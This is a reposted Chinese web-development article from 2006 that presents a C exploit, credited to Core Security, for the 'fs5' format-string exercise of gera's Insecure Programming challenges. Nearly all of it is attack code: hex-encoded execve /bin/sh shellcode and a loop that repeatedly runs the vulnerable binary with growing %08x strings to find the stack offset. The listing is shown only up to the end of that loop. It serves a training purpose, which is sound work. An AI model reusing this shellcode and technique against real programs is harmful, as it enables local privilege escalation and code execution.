
Insecure Programming Demonstration: Format Strings (2)

2006-04-02 20:26:42 Source: WEB开发网


The demonstration exploit is as follows:


/*
** exp_fs5.c
** Coded by Core Security - info@core-sec.com
*/

#include <string.h>
#include <strings.h>   /* bzero() */
#include <stdio.h>
#include <unistd.h>

#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs5"
#define GREP "/bin/grep"

/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main() {
    char evil_buffer[256], temp_buffer[256];
    char *env[3] = {shellcode, NULL};
    char *p;
    int deregister_address, first_half, second_half, i;
    FILE *f;
    int ret = 0xbffffffa - strlen(shellcode) -
              strlen("/home/user/gera/fs5");

    bzero(evil_buffer, sizeof(evil_buffer));
    sprintf(evil_buffer, "%s AAAA", VICTIM);

    /* Finding stack pop */
    printf("\nReading stack frames...\n");
    for(i = 0; i < 30; i ++) {
        /* Add one more %08x per pass and re-run the target */
        strcat(evil_buffer, "%08x");

        f = popen(evil_buffer, "r");
        fscanf(f, "%s", temp_buffer);

        /* Output is "AAAA" followed by one 8-hex-digit word per %08x;
           p points at the most recently added word */
        p = temp_buffer + (4 + i*8);
        printf("frame %.2d --> %s\n", (i + 1), p);

        if(!strcmp(p, "41414141")) {
            printf("\nExact match found. Stack pop is: %d\n\n", i + 1);
            pclose(f);
            break;
        }
        pclose(f);
        bzero(temp_buffer, sizeof(temp_buffer));
    }


Entered by: 爽爽